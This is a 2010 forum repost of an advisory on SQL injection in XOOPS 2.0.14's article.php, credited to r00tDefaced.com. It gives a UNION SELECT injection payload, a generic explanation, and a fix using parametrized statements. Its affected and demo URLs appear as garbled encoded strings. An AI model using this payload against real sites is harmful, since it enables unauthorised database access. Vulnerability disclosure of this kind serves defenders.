[转帖]XOOPS 2.0.14 (article.php) SQL Injection Vulnerability-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[转帖]XOOPS 2.0.14 (article.php) SQL Injection Vulnerability

发表于: 2010-8-29 14:17 2164

[转帖]XOOPS 2.0.14 (article.php) SQL Injection Vulnerability

freebsdlin 活跃值

2010-8-29 14:17

2164

#

# [2]-SQL injection

#

# Vulnerability Description:

#             SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an #application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL #statements or user input is not strongly typed and thereby unexpectedly executed.

#

# Affected items:

#       5f4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8Y4m8S2N6r3S2Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0r3j5i4u0@1K9h3y4D9k6i4y4Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0W2M7r3S2H3i4K6y4r3K9h3c8Q4x3@1c8Q4y4f1u0e0f1f1H3`. Injection]

#

# Example: -1337+uNiOn+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- [You can find the number of vulnerable query]

# Demo: b40K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0r3j5i4u0@1K9h3y4D9k6i4y4Q4x3V1k6S2M7Y4c8A6j5$3I4W2i4K6u0W2M7r3S2H3i4K6y4r3K9h3c8Q4x3@1b7I4i4K6t1#2x3U0m8#2L8X3W2G2L8W2)9J5y4e0t1H3j5h3I4D9i4K6t1#2x3U0m8K6k6h3I4W2j5%4c8Q4x3U0f1J5x3o6q4Q4x3V1x3J5i4K6u0o6x3#2)9J5b7K6c8Q4x3V1y4Q4y4o6m8Q4y4o6m8$3k6i4u0K6K9h3!0F1i4K6u0o6y4W2)9J5b7K6N6Q4x3V1x3^5i4K6u0o6z5g2)9J5b7K6p5H3i4K6u0o6x3e0q4Q4x3V1x3I4x3W2)9J5b7K6p5K6i4K6u0o6x3e0c8Q4x3V1x3I4y4g2)9J5b7K6p5$3i4K6u0o6x3e0N6Q4x3V1x3I4z5q4)9J5b7K6p5&6i4K6u0o6x3U0m8Q4x3X3c8Q4x3X3c8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

#

# The Risk:

#    By exploiting this vulnerability, an attacker can inject malicious code in the script and can have access to the database.

#

# Fix the vulnerability:

#    To protect against SQL injection, user input must not directly be embedded in SQL statements. Instead, parametrized statements must be used #(preferred), or user input must be carefully escaped or filtered.

#

#################################################################

#################################################################

# r00tDefaced.com [28/08/2010]

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・1

免费・0

支持